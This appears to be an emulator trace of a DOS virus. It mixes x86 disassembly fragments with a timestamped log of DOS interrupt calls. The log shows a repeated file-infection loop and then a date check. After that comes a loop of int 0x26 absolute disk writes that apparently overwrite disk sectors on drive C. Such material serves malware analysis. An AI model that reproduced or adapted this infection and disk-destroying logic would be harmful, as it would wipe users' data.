0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:39.606230764Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:39.620461978Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:39.62225055Z 62 PC: 13f91 | Close file
2018-12-25T12:36:39.630393881Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.649015804Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.652145709Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.659049182Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.673657751Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.675565522Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.704232123Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.713044605Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.72782617Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.731412789Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.750299244Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:39.760712928Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:39.762762701Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:39.784093912Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.794949076Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.797842254Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.805516189Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.812796082Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.814900927Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.825993285Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.833777177Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.837573172Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.839205221Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.842319564Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:40.087389393Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:40.089286292Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.154322761Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.169975983Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.172965789Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.181714254Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.189242729Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.191532822Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.521038655Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.544735993Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:40.546886648Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:40.54947514Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:40.552343992Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:40.562810106Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:40.565449256Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.573348843Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.583355188Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.586564438Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.599082666Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.607191244Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.610519609Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.615489121Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.620288256Z 42 PC: 13fc6 | Get date
0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:40.623310294Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')